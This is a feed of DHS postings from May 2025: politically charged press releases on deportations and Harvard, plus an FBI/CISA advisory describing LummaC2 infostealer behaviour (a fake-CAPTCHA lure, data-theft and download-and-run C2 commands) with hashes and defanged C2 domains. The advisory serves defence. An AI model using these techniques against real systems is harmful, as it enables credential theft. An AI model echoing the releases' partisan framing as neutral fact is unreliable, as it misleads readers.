Category: NCTC Speeches, Testimonies and Interviews

Auto Added by WPeMatico

Posted on

President Trump and Secretary Noem Recognize 101 Years of Border Patrol

Source: US Department of Homeland Security

WASHINGTON – On Tuesday, President Donald J. Trump issued a Proclamation recognizing the United States Border Patrol on the eve of its 101st anniversary. 

“For more than a century, the men and women of the Border Patrol have stood on the front lines of national security as America’s original watchmen. The threats may change, but the mission remains: protect the homeland,” said Department of Homeland Security Secretary Kristi Noem. “On Border Patrol’s 101st anniversary, we honor and thank all who’ve worn the uniform. A nation without borders is no nation at all.”  

As noted by the Proclamation, President Donald Trump has delivered the most secure border in American history, with border crossings at their lowest ever. 

“For 101 years, members of the United States Border Patrol (USBP) have courageously served as guardians of our sovereignty and protectors of our homeland against invasion, aggression, and violence,” President Trump said in the Proclamation. “Every day, Border Patrol agents selflessly risk their lives to repel the flow of deadly drugs, weapons, criminals, and terrorists — many of whom come to our shores from jails, prisons, and mental institutions in far-flung countries across the globe. On this anniversary of the United States Border Patrol, we honor every agent for their honorable service and pledge to support them in their mission to keep Americans safe.” 

Read the Proclamation here.

###

Posted on

MEDIA ADVISORY: FOR PLANNING PURPOSES ONLY: U.S. Department of Homeland Security Secretary Kristi Noem to Travel to Israel

Source: US Department of Homeland Security

Visit to include meeting with Israeli PM Netanyahu, Visits with Victims of Terrorism

WASHINGTON – Following the recent terrorist attack in Washington, D.C., President Donald J. Trump has asked Secretary of Homeland Security Kristi Noem to travel to Israel. During the visit, she will meet with Israeli Prime Minister Benjamin Netanyahu and victims of terrorism.

WHEN: Sunday, May 25- Monday, May 26.

IDT (GMT+3)

Sunday, May 25, 2025

7:30 PM          THE SECRETARY arrives in Israel
                       Ben Gurion Airport

9:15 PM          THE SECRETARY visits the Western Wall
                       Batel Mahase Street
                       Traveling press            

Monday, May 26, 2025

9:00 AM          THE SECRETARY meets with the Minister of Foreign Affairs
                       Sderot Yitzhak Rabin 9, Jerusalem
                       American and Foreign press

3:45 PM          THE SECRETARY arrives Ben Gurion Airport
                                
4:15 PM          THE SECRETARY departs Ben Gurion Airport en route Poland. 
                   
Please RSVP media@hq.DHS.gov if you plan to cover the events. Times are subject to change. 
 

Posted on

ACLU Attempt to Block Criminal Illegal Alien Removals Fails Spectacularly

Source: US Department of Homeland Security

The ACLU’s dangerous campaign to keep violent criminals in the United States is falling apart.

WASHINGTON – Homeland Security Secretary Kristi Noem announced that the American Civil Liberties Union’s (ACLU) latest attempt to wage lawfare against the Department was dropped. This lawsuit tried to prevent DHS from removing dangerous criminal illegal aliens from the country. 

“We are glad to see the ACLU’s meritless, frivolous, and frankly dangerous lawsuit fall apart,” said Assistant Secretary Tricia McLaughlin. “That they claim to be a civil rights organization while advocating on behalf of foreign criminal gang members is laughable. They clearly could care less about the Americans that these illegal alien criminals victimize.”

The lawsuit was filed on March 1, 2025, by the ACLU on behalf of 10 illegal aliens who were being transferred to a detention facility at Guantanamo Bay in preparation for their removal. Most of these criminal illegal aliens were removed from the country, while the remaining volunteered to drop the suit. 

Fortunately, these criminals will no longer to be able to victimize American citizens. The Department will continue to use all available resources to remove the dangerous criminal illegal aliens who were let into our country by the previous administration. 

###

Posted on

DHS Releases Documents Detailing the Rap Sheets of 8 Criminal Illegal Aliens after Activist Judge Ruling Halts their Deportation

Source: US Department of Homeland Security

President Trump and Secretary Noem are getting vicious criminals out of our country while activist judges are fighting to bring them back onto American soil

WASHINGTON – The Department of Homeland Security (DHS) today released records on the eight convicted murderers and rapists that an activist judge halted their deportation. All eight of these barbaric criminal illegal aliens have final orders of removal and have been convicted in a court of law. These records reveal even more details about these illegal aliens’ heinous crimes.  

To download the documents, click here.

“Today, DHS released the rap sheets for eight of these uniquely monstrous, criminal illegal aliens who have final deportation orders that the U.S. government is actively trying to deport. The American public should know the heinous crimes of these murderers, rapists, and pedophiles that this activist district court judge is trying to bring back to American soil,” said Assistant Secretary Tricia McLaughlin. “As he spits in the fact of victims, this Massachusetts district court judge is stalling the final removal of these barbaric individuals from the country and wants taxpayers to continue to foot the bill to keep these criminals in DHS custody overseas. It is deranged.”  

Below are excerpts of the rap sheets of each of the criminal illegal aliens, detailing heinous crimes.  

Nyo Myint: Convicted sexual assault of a mentally disabled woman 

Nyo Myint, an illegal Burma and registered sex offender was arrested by ICE St. Paul on February 18, 2025. Myint is convicted of first-degree sexual assault involving a victim mentally and physically incapable of resisting; sentenced to 12 years confinement. Myint is also charged with aggravated assault-nonfamily strongarm. He was issued a final order of removal on August 17, 2023.

Image

Enrique Arias-Hierro: Convicted homicide, armed robbery 

Enrique Arias-Hierro, an illegal alien from Cuba, was arrested by ICE Miami on May 2, 2025. His criminal history includes convictions for homicide, armed robbery, false impersonation of official, kidnapping, robbery strong arm. He was issued a final order of removal on September 13, 1999.

Image

Tuan Thanh Phan: Convicted of first-degree murder and second-degree assault 

On May 3, 2025, ICE Seattle arrested Tuan Thanh Phan, an illegal alien from Vietnam. Phan is Convicted of first-degree murder and second-degree assault; sentenced to 22 years confinement. Prior to that, he was charged with possession of a dangerous weapon on a school facility as a juvenile in 1999. He was issued a final order of removal on June 17, 2009.

Image

Jose Manuel Rodriquez-Quinones: Convicted of first-degree murder 

On April 30, 2025, ICE Miami arrested Jose Manuel Rodriguez-Quinones, an illegal alien from Cuba. He has been convicted of attempted first-degree murder with a weapon, battery and larceny, cocaine possession and trafficking. Additionally, he was charged with attempted first-degree murder, trafficking and possessing cocaine, assault, credit card fraud, and theft. He was issued a final order of removal on December 4, 2012.

Image

Dian Domach: Convicted of robbery  

Dian Domach is an illegal alien from South Sudan that ICE first encountered in 2011 and was charged as a deportable alien. While in the U.S. Domach was convicted of robbery and possession of a firearm, of possession of burglar’s tools and possession of defaced firearm and driving under the influence. He was arrested by ICE on May 8, 2024, and was issued a final order of removal on July 19, 2011.

Image

Thongxay Nilakout: Convicted Murderer Sentenced to Life in Prison 

Thongxay Nilakout, an illegal alien from Laos, was arrested by ICE Los Angeles on January 26, 2025. Nilakout was convicted of first-degree murder and robbery; sentenced to life in prison. He was issued a final order of removal on July 12, 2023.

Image

Jesus Munoz-Gutierrez: Convicted murderer sentenced to life in prison 

On May 12, 2025, ICE Miami arrested Jesus Munoz-Gutierrez, an illegal alien from Mexico. He is convicted of second-degree murder; sentenced to life confinement. He was issued a final order of removed on June 16, 2005.

Image

Kyaw Mya: Convicted of rape of a child 

Kyaw Mya, an illegal alien from Burma was arrested by ICE St. Paul on February 18, 2025. Mya is convicted of Lascivious Acts with a Child-Victim less than 12 years of age; sentenced to 10 years confinement, paroled after 4 years. He was issued a final order of removal on March 17, 2022.

Image

###

Posted on

Harvard University Loses Student and Exchange Visitor Program Certification for Pro-Terrorist Conduct

Source: US Department of Homeland Security

Harvard is being held accountable for collaboration with the CCP, fostering violence, antisemitism, and pro-terrorist conduct from students on its campus.

WASHINGTON – Today, Homeland Security Secretary Kristi Noem ordered DHS to terminate the Harvard University’s Student and Exchange Visitor Program (SEVP) certification. 

This means Harvard can no longer enroll foreign students and existing foreign students must transfer or lose their legal status. 

Harvard’s leadership has created an unsafe campus environment by permitting anti-American, pro-terrorist agitators to harass and physically assault individuals, including many Jewish students, and otherwise obstruct its once-venerable learning environment. Many of these agitators are foreign students. Harvard’s leadership further facilitated, and engaged in coordinated activity with the CCP, including hosting and training members of a CCP paramilitary group complicit in the Uyghur genocide.

“This administration is holding Harvard accountable for fostering violence, antisemitism, and coordinating with the Chinese Communist Party on its campus,” said Secretary Noem. “It is a privilege, not a right, for universities to enroll foreign students and benefit from their higher tuition payments to help pad their multibillion-dollar endowments. Harvard had plenty of opportunity to do the right thing. It refused. They have lost their Student and Exchange Visitor Program certification as a result of their failure to adhere to the law. Let this serve as a warning to all universities and academic institutions across the country.”

On April 16, 2025, Secretary Noem demanded Harvard provide information about the criminality and misconduct of foreign students on its campus. Secretary Noem warned refusal to comply with this lawful order would result in SEVP termination.

This action comes after DHS terminated $2.7 million in DHS grants for Harvard last month. 

Harvard University brazenly refused to provide the required information requested and ignored a follow up request from the Department’s Office of General Council. Secretary Noem is following through on her promise to protect students and prohibit terrorist sympathizers from receiving benefits from the U.S. government.

Facts about Harvard’s toxic campus climate:

  • A joint-government task force found that Harvard has failed to confront pervasive race discrimination and anti-Semitic harassment plaguing its campus.
  • Jewish students on campus were subject to pervasive insults, physical assault, and intimidation, with no meaningful response from Harvard’s leadership.
  • A protester charged for his role in the assault of a Jewish student on campus was chosen by the Harvard Divinity School to be the Class Marshal for commencement.
  • Harvard’s own 2025 internal study on anti-Semitism revealed that almost 60% of Jewish students reported experiencing “discrimination, stereotyping, or negative bias on campus due to [their] views on current events.”
  • In one instance, a Jewish student speaker at a conference had planned to tell the story of his Holocaust survivor grandfather finding refuge in Israel. Organizers told the student the story was not “tasteful” and laughed at him when he expressed his confusion. They said the story would have justified oppression.
  • Meanwhile, Pro-Hamas student groups that promoted antisemitism after the October 7 attacks remained recognized and funded.

Instead of protecting its students, Harvard has let crime rates skyrocket, enacted racist DEI practices, and accepted boatloads of cash from foreign governments and donors. 

###

Posted on

AI Data Security: Best Practices for Securing Data Used to Train & Operate AI Systems

Source: US Department of Homeland Security

CISA, the National Security Agency, the Federal Bureau of Investigation, and international partners released AI Data Security: Best Practices for Securing Data Used to Train & Operate AI Systems

This guidance highlights the critical role of data security in ensuring the accuracy, integrity, and trustworthiness of AI outcomes. It outlines key risks that may arise from data security and integrity issues across all phases of the AI lifecycle, from development and testing to deployment and operation. 

Posted on

DHS Reacts to Activist Judge Ruling to Halt the Deportation of Barbaric Criminal Illegal Aliens Including Murderers, Rapists, and Pedophiles

Source: US Department of Homeland Security

All eight of these heinous convicted criminals have final orders of removal 

WASHINGTON – DHS conducted a deportation flight to remove some of the most barbaric, violent individuals illegally in the United States. All of these individuals had final orders of removal.  Now a federal judge in Massachusetts is halting their deportation and trying to force President Trump to bring these criminals back to American soil.  

“This ruling is deranged. These depraved individuals have all had their day in court and been given final deportation orders. A reminder of who was on this plane: murderers, child rapists, an individual who raped a mentally & physically disabled person,” said Assistant Secretary Tricia McLaughlin.The message this activist judge is sending to victims and their families is we don’t care. President Trump and Secretary Noem are working every day to get vicious criminals out of our country while activist judges are fighting to bring them back onto American soil.” 

Below are the individuals ICE removed from American communities:  

Enrique ARIAS-Hierro, a Cuban national, was arrested by ICE Miami on May 2, 2025. His criminal history includes convictions for homicide, armed robbery, false impersonation of official, kidnapping, robbery strong arm. He was issued a final order of removal on September 13, 1999.  

Image

On April 30, 2025, ICE Miami arrested Cuban national, Jose Manuel RODRIGUEZ-QUINONES. He has been convicted of attempted first degree murder with a weapon, battery and larceny, cocaine possession and trafficking. He was issued a final order of removal on December 4, 2012.  

Image

Thongxay NILAKOUT, a citizen of Laos, was arrested by ICE Los Angeles on January 26, 2025. NILAKOUT is Convicted of first-degree murder and robbery; sentenced to life confinement. He was issued a final order of removal on July 12, 2023.  

Image

On May 12, 2025, ICE Miami arrested Mexican national, Jesus MUNOZ-Gutierrez. He is Convicted of second-degree murder; sentenced to life confinement. He was issued a final order of removed on June 16, 2005.  

Image

Dian Peter DOMACH, a citizen of South Sudan, was arrested by ICE St. Paul on May 8, 2024. DOMACH is convicted of robbery and possession of a firearm, of possession of burglar’s tools and possession of defaced firearm and driving under the influence. He was issued a final order of removal on July 19, 2011.  

Image

Kyaw MYA, a citizen of Burma was arrested by ICE St. Paul on February 18, 2025. MYA is convicted of Lascivious Acts with a Child-Victim less than 12 years of age; sentenced to 10 years confinement, paroled after 4 years. He was issued a final order of removal on March 17, 2022.   

Image

Nyo MYINT, a citizen of Burma was arrested by ICE St. Paul on February 18, 2025. MYINT is convicted of first-degree sexual assault involving a victim mentally and physically incapable of resisting; sentenced to 12 years confinement. MYINT is also charged with aggravated assault-nonfamily strongarm. He was issued a final order of removal on August 17, 2023.   

Image

On May 3, 2025, ICE Seattle arrested Tuan Thanh PHAN, a Vietnamese national. PHAN is Convicted of first-degree murder and second-degree assault; sentenced to 22 years confinement. He was issued a final order of removal on June 17, 2009.  

Image

###

Posted on

ICE Lodges Detainer for 24-year-old Illegal Alien Posing as Teenager in Ohio

Source: US Department of Homeland Security

WASHINGTON – The Department of Homeland Security today announced that Immigration and Customs Enforcement (ICE) lodged a detainer for a 24-year-old illegal alien from Venezuela who posed as a teenager to attend an Ohio high school. 

On May 19, the Perrysburg Ohio Police Department arrested and charged Anthony Emmanuel Labrador-Sierra with forgery. On May 20, ICE issued a detainer. 

Image

Mug shot from Wood County Jail.

“Anthony Emmanuel Labrador-Sierra is a 24-year-old illegal alien from Venezuela who has been posing as teenager and attending Perrysburg High School in Ohio,” said Assistant Secretary Tricia McLaughlin. “Labrador was arrested and charged with forgery by the Perrysburg Ohio Police Department on May 19 for using fake documents to become enrolled in the high school. ICE lodged a detainer to ensure that this criminal illegal alien is removed from this community and no longer able to prey on the students of Perrysburg High School. It is disturbing that a grown man would impersonate a teenager and infiltrate the lives of underage girls and boys to fool them into doing God knows what.”

Labrador has illegally been in the U.S. since March 24, 2020. 

###

Posted on

Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations

Source: US Department of Homeland Security

Summary

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint advisory to disseminate known tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with threat actors deploying the LummaC2 information stealer (infostealer) malware. LummaC2 malware is able to infiltrate victim computer networks and exfiltrate sensitive information, threatening vulnerable individuals’ and organizations’ computer networks across multiple U.S. critical infrastructure sectors. According to FBI information and trusted third-party reporting, this activity has been observed as recently as May 2025. The IOCs included in this advisory were associated with LummaC2 malware infections from November 2023 through May 2025.

The FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of LummaC2 malware.

Download the PDF version of this report:

For a downloadable copy of IOCs, see:

Technical Details

Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 17. See the MITRE ATT&CK Tactics and Techniques section of this advisory for threat actor activity mapped to MITRE ATT&CK tactics and techniques.

Overview

LummaC2 malware first appeared for sale on multiple Russian-language speaking cybercriminal forums in 2022. Threat actors frequently use spearphishing hyperlinks and attachments to deploy LummaC2 malware payloads [T1566.001, T1566.002]. Additionally, threat actors rely on unsuspecting users to execute the payload by clicking a fake Completely Automated Public Turing Test to tell Computers and Humans Apart (CAPTCHA). The CAPTCHA contains instructions for users to then open the Windows Run window (Windows Button + R) and paste clipboard contents (“CTRL + V”). After users press “enter” a subsequent Base64-encoded PowerShell process is executed.

To obfuscate their operations, threat actors have embedded and distributed LummaC2 malware within spoofed or fake popular software (i.e., multimedia player or utility software) [T1036]. The malware’s obfuscation methods allow LummaC2 actors to bypass standard cybersecurity measures, such as Endpoint Detection and Response (EDR) solutions or antivirus programs, designed to flag common phishing attempts or drive-by downloads [T1027].

Once a victim’s computer system is infected, the malware can exfiltrate sensitive user information, including personally identifiable information, financial credentials, cryptocurrency wallets, browser extensions, and multifactor authentication (MFA) details without immediate detection [TA0010, T1119]. Private sector statistics indicate there were more than 21,000 market listings selling LummaC2 logs on multiple cybercriminal forums from April through June of 2024, a 71.7 percent increase from April through June of 2023.

File Execution

Upon execution, the LummaC2.exe file will enter its main routine, which includes four sub-routines (see Figure 1).

Figure 1. LummaC2 Main Routine

The first routine decrypts strings for a message box that is displayed to the user (see Figure 2).

Figure 2. Message Box

If the user selects No, the malware will exit. If the user selects Yes, the malware will move on to its next routine, which decrypts its callback Command and Control (C2) domains [T1140]. A list of observed domains is included in the Indicators of Compromise section.

After each domain is decoded, the implant will attempt a POST request [T1071.001] (see Figure 3).

Figure 3. Post Request

If the POST request is successful, a pointer to the decoded domain string is saved in a global variable for later use in the main C2 routine used to retrieve JSON formatted commands (see Figure 4).

Figure 4. Code Saving Successful Callback Request

Once a valid C2 domain is contacted and saved, the malware moves on to the next routine, which queries the user’s name and computer name utilizing the Application Programming Interfaces (APIs) GetUserNameW and GetComputerNameW respectively [T1012]. The returned data is then hashed and compared against a hard-coded hash value (see Figure 5).

Figure 5. User and Computer Name Check

The hashing routine was not identified as a standard algorithm; however, it is a simple routine that converts a Unicode string to a 32-bit hexadecimal value.

If the username hash is equal to the value 0x56CF7626, then the computer name is queried. If the computer name queried is seven characters long, then the name is hashed and checked against the hard-coded value of 0xB09406C7. If both values match, a final subroutine will be called with a static value of the computer name hash as an argument. If this routine is reached, the process will terminate. This is most likely a failsafe to prevent the malware from running on the attacker’s system, as its algorithms are one-way only and will not reveal information on the details of the attacker’s own hostname and username.

If the username and hostname check function returns zero (does not match the hard-coded values), the malware will enter its main callback routine. The LummaC2 malware will contact the saved hostname from the previous check and send the following POST request (see Figure 6).

Figure 6. Second POST Request

The data returned from the C2 server is encrypted. Once decoded, the C2 data is in a JSON format and is parsed by the LummaC2 malware. The C2 uses the JSON configuration to parse its browser extensions and target lists using the ex key, which contains an array of objects (see Figure 7).

Figure 7. Parsing of ex JSON Value

Parsing the c key contains an array of objects, which will give the implant its C2 (see Figure 8).

Figure 8. Parsing of c JSON Value

C2 Instructions

Each array object that contains the JSON key value of t will be evaluated as a command opcode, resulting in the C2 instructions in the subsections below.

1. Opcode 0 – Steal Data Generic

This command allows five fields to be defined when stealing data, offering the most flexibility. The Opcode O command option allows LummaC2 affiliates to add their custom information gathering details (see Table 1).

Table 2. Opcode 1 Options
Key Value
p Path to steal from
m File extensions to read
z Output directory to store stolen data
d Depth of recursiveness
fs Maximum file size

2. Opcode 1 – Steal Browser Data

This command only allows for two options: a path and the name of the output directory. This command, based on sample configuration downloads, is used for browser data theft for everything except Mozilla [T1217] (see Table 2).

Table 2. Opcode 1 Options
Key Value
p Path to steal from
z Name of Browser – Output

3. Opcode 2 – Steal Browser Data (Mozilla)

This command is identical to Opcode 1; however, this option seems to be utilized solely for Mozilla browser data (see Table 3).

Table 3. Opcode 2 Options
Key Value
p Path to steal from
z Name of Browser – Output

4. Opcode 3 – Download a File

This command contains three options: a URL, file extension, and execution type. The configuration can specify a remote file with u to download and create the extension specified in the ft key [T1105] (see Table 4).

Table 4. Opcode 3 Options
Key Value
u URL for Download
ft File Extension
Execution Type

The e value can take two values: 0 or 1. This specifies how to execute the downloaded file either with the LoadLibrary API or via the command line with rundll32.exe [T1106] (see Table 5).

Table 5. Execution Types
Key Value
e=0 Execute with LoadLibraryW()
e=1 Executive with rund1132.exe

5. Take Screenshot

If the configuration JSON file has a key of “se” and its value is “true,” the malware will take a screenshot in BMP format and upload it to the C2 server.

6. Delete Self

If the configuration JSON file has a key of “ad” and its value is “true,” the malware will enter a routine to delete itself.

The command shown in Figure 9 will be decoded and executed for self-deletion.

Figure 9. Self-Deletion Command Line

Figure 10 depicts the above command line during execution.

Figure 10. Decoded Command Line in Memory

Host Modifications

Without any C2 interactions, the LummaC2 malware does not create any files on the infected drive. It simply runs in memory, gathers system information, and exfiltrates it to the C2 server [T1082]. The commands returned from the C2 server could indicate that it drops additional files and/or saves data to files on the local hard drive. This is variable, as these commands come from the C2 server and are mutable.

Decrypted Strings

Below is a list of hard-coded decrypted strings located in the binary (see Figure 11).

Figure 11. Decoded Strings

Indicators of Compromise

See Table 6 and Table 7 for LummaC2 IOCs obtained by the FBI and trusted third parties.

Disclaimer: The authoring agencies recommend organizations investigate and vet these indicators of compromise prior to taking action, such as blocking.

Table 6. LummaC2 Executable Hashes
Executables Type
4AFDC05708B8B39C82E60ABE3ACE55DB (LummaC2.exe from November 2023) MD5
E05DF8EE759E2C955ACC8D8A47A08F42 (LummaC2.exe from November 2023) MD5
C7610AE28655D6C1BCE88B5D09624FEF MD5
1239288A5876C09D9F0A67BCFD645735168A7C80 (LummaC2.exe from November 2023) SHA1
B66DA4280C6D72ADCC68330F6BD793DF56A853CB (LummaC2.exe from November 2023) SHA1
3B267FA5E1D1B18411C22E97B367258986E871E5 TLSH
19CC41A0A056E503CC2137E19E952814FBDF14F8D83F799AEA9B96ABFF11EFBB (November 2023) SHA256
2F31D00FEEFE181F2D8B69033B382462FF19C35367753E6906ED80F815A7924F (LummaC2.exe from November 2023) SHA256
4D74F8E12FF69318BE5EB383B4E56178817E84E83D3607213160276A7328AB5D SHA256
325daeb781f3416a383343820064c8e98f2e31753cd71d76a886fe0dbb4fe59a SHA256
76e4962b8ccd2e6fd6972d9c3264ccb6738ddb16066588dfcb223222aaa88f3c SHA256
7a35008a1a1ae3d093703c3a34a21993409af42eb61161aad1b6ae4afa8bbb70 SHA256
a9e9d7770ff948bb65c0db24431f75dd934a803181afa22b6b014fac9a162dab SHA256
b287c0bc239b434b90eef01bcbd00ff48192b7cbeb540e568b8cdcdc26f90959 SHA256
ca47c8710c4ffb4908a42bd986b14cddcca39e30bb0b11ed5ca16fe8922a468b SHA256
Table 7. LummaC2 DLL Binaries
DLL Binaries Type
iphlpapi.dll IP Helper API
winhttp.dll Windows HTTP Services

The following are domains observed deploying LummaC2 malware.

Disclaimer: The domains below are historical in nature and may not currently be malicious.

  • Pinkipinevazzey[.]pw
  • Fragnantbui[.]shop
  • Medicinebuckerrysa[.]pw
  • Musicallyageop[.]pw
  • stogeneratmns[.]shop
  • wallkedsleeoi[.]shop
  • Tirechinecarpet[.]pw
  • reinforcenh[.]shop
  • reliabledmwqj[.]shop
  • Musclefarelongea[.]pw
  • Forbidstow[.]site
  • gutterydhowi[.]shop
  • Fanlumpactiras[.]pw
  • Computeryrati[.]site
  • Contemteny[.]site
  • Ownerbuffersuperw[.]pw
  • Seallysl[.]site
  • Dilemmadu[.]site
  • Freckletropsao[.]pw
  • Opposezmny[.]site
  • Faulteyotk[.]site
  • Hemispheredodnkkl[.]pw
  • Goalyfeastz[.]site
  • Authorizev[.]site
  • ghostreedmnu[.]shop
  • Servicedny[.]site
  • blast-hubs[.]com
  • offensivedzvju[.]shop
  • friendseforever[.]help
  • blastikcn[.]com
  • vozmeatillu[.]shop
  • shiningrstars[.]help
  • penetratebatt[.]pw
  • drawzhotdog[.]shop
  • mercharena[.]biz
  • pasteflawwed[.]world
  • generalmills[.]pro
  • citywand[.]live
  • hoyoverse[.]blog
  • nestlecompany[.]pro
  • esccapewz[.]run
  • dsfljsdfjewf[.]info
  • naturewsounds[.]help
  • travewlio[.]shop
  • decreaserid[.]world
  • stormlegue[.]com
  • touvrlane[.]bet
  • governoagoal[.]pw
  • paleboreei[.]biz
  • calmingtefxtures[.]run
  • foresctwhispers[.]top
  • tracnquilforest[.]life
  • sighbtseeing[.]shop
  • advennture[.]top
  • collapimga[.]fun
  • holidamyup[.]today
  • pepperiop[.]digital
  • seizedsentec[.]online
  • triplooqp[.]world
  • easyfwdr[.]digital
  • strawpeasaen[.]fun
  • xayfarer[.]live
  • jrxsafer[.]top
  • quietswtreams[.]life
  • oreheatq[.]live
  • plantainklj[.]run
  • starrynsightsky[.]icu
  • castmaxw[.]run
  • puerrogfh[.]live
  • earthsymphzony[.]today
  • weldorae[.]digital
  • quavabvc[.]top
  • citydisco[.]bet
  • steelixr[.]live
  • furthert[.]run
  • featureccus[.]shop
  • smeltingt[.]run
  • targett[.]top
  • mrodularmall[.]top
  • ferromny[.]digital
  • ywmedici[.]top
  • jowinjoinery[.]icu
  • rodformi[.]run
  • legenassedk[.]top
  • htardwarehu[.]icu
  • metalsyo[.]digital
  • ironloxp[.]live
  • cjlaspcorne[.]icu
  • navstarx[.]shop
  • bugildbett[.]top
  • latchclan[.]shop
  • spacedbv[.]world
  • starcloc[.]bet
  • rambutanvcx[.]run
  • galxnetb[.]today
  • pomelohgj[.]top
  • scenarisacri[.]top
  • jawdedmirror[.]run
  • changeaie[.]top
  • lonfgshadow[.]live
  • liftally[.]top
  • nighetwhisper[.]top
  • salaccgfa[.]top
  • zestmodp[.]top
  • owlflright[.]digital
  • clarmodq[.]top
  • piratetwrath[.]run
  • hemispherexz[.]top
  • quilltayle[.]live
  • equatorf[.]run
  • latitudert[.]live
  • longitudde[.]digital
  • climatologfy[.]top
  • starofliught[.]top

MITRE ATT&CK Tactics and Techniques

See Table 8 through Table 13 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 8. Initial Access
Technique Title ID Use
Phishing T1566 Threat actors delivered LummaC2 malware through phishing emails.
Phishing: Spearphishing Attachment T1566.001 Threat actors used spearphishing attachments to deploy LummaC2 malware payloads.
Phishing: Spearphishing Link T1566.002 Threat actors used spearphishing hyperlinks to deploy LummaC2 malware payloads.
Table 9. Defense Evasion
Technique Title ID Use
Obfuscated Files or Information T1027 Threat actors obfuscated the malware to bypass standard cybersecurity measures designed to flag common phishing attempts or drive-by downloads.
Masquerading T1036 Threat actors delivered LummaC2 malware via spoofed software.
Deobfuscate/Decode Files or Information T1140 Threat actors used LummaC2 malware to decrypt its callback C2 domains.
Table 10. Discovery
Technique Title ID Use
Query Registry T1012 Threat actors used LummaC2 malware to query the user’s name and computer name utilizing the APIs GetUserNameW and GetComputerNameW.
Browser Information Discovery T1217 Threat actors used LummaC2 malware to steal browser data.
Table 11. Collection
Technique Title ID Use
Automated Collection T1119 LummaC2 malware has automated collection of various information including cryptocurrency wallet details.
Table 12. Command and Control
Technique Title ID Use
Application Layer Protocol: Web Protocols T1071.001 Threat actors used LummaC2 malware to attempt POST requests.
Ingress Tool Transfer T1105 Threat actors used LummaC2 malware to transfer a remote file to compromised systems.
Table 13. Exfiltration
Technique Title ID Use
Exfiltration TA0010 Threat actors used LummaC2 malware to exfiltrate sensitive user information, including traditional credentials, cryptocurrency wallets, browser extensions, and MFA details without immediate detection.
Native API T1106 Threat actors used LummaC2 malware to download files with native OS APIs.

Mitigations

The FBI and CISA recommend organizations implement the mitigations below to reduce the risk of compromise by LummaC2 malware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPGs webpage for more information on the CPGs, including additional recommended baseline protections. These mitigations apply to all critical infrastructure organizations.

  • Separate User and Privileged Accounts: Allow only necessary users and applications access to the registry [CPG 2.E].
  • Monitor and detect suspicious behavior during exploitation [CPG 3.A].
    • Monitor and detect suspicious behavior, creation and termination events, and unusual and unexpected processes running.
    • Monitor API calls that may attempt to retrieve system information.
    • Analyze behavior patterns from process activities to identify anomalies.
    • For more information, visit CISA’s guidance on: Enhanced Visibility and Hardening Guidance for Communications Infrastructure.
  • Implement application controls to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
  • Protect against threat actor phishing campaigns by implementing CISA’s Phishing Guidance and Phishing-resistant multifactor authentication. [CPG 2.H]
  • Log Collection: Regularly monitoring and reviewing registry changes and access logs can support detection of LummaC2 malware [CPG 2.T].
  • Implement authentication, authorization, and accounting (AAA) systems [M1018] to limit actions users can perform and review logs of user actions to detect unauthorized use and abuse. Apply principles of least privilege to user accounts and groups, allowing only the performance of authorized actions.
  • Audit user accounts and revoke credentials for departing employees, removing those that are inactive or unnecessary on a routine basis [CPG 2.D]. Limit the ability for user accounts to create additional accounts.
  • Keep systems up to date with regular updates, patches, hot fixes, and service packs that may minimize vulnerabilities. Learn more by visiting CISA’s webpage: Secure our World Update Software.
  • Secure network devices to restrict command line access.
  • Use segmentation to prevent access to sensitive systems and information, possibly with the use of Demilitarized Zone (DMZ) or virtual private cloud (VPC) instances to isolate systems [CPG 2.F].
  • Monitor and detect API usage, looking for unusual or malicious behavior.

Validate Security Controls

In addition to applying mitigations, the FBI and CISA recommend exercising, testing, and validating your organization’s security program against threat behaviors mapped to the MITRE ATT&CK Matrix for Enterprise framework in this advisory. The FBI and CISA recommend testing your existing security controls inventory to assess performance against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Table 8 through Table 13).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

Reporting

Your organization has no obligation to respond or provide information to the FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws.

The FBI is interested in any information that can be shared, to include the status and scope of infection, estimated loss, date of infection, date detected, initial attack vector, and host- and network-based indicators.

To report information, please contact the FBI’s Internet Crime Complaint Center (IC3), your local FBI field office, or CISA’s 24/7 Operations Center at report@cisa.gov or (888) 282-0870.

Disclaimer

The information in this report is being provided “as is” for informational purposes only. The FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favor by the FBI and CISA.

Acknowledgements

ReliaQuest contributed to this advisory.

Version History

May 21, 2025: Initial version.

Posted on

DHS Sets the Record Straight on Media Frenzy over Deportation Flights for Worst of the Worst Including Murderers, Rapists, and Pedophiles

Source: US Department of Homeland Security

President Trump and Secretary Noem are working every day to get vicious criminals out of our country while activist judges are fighting to bring them back onto American soil

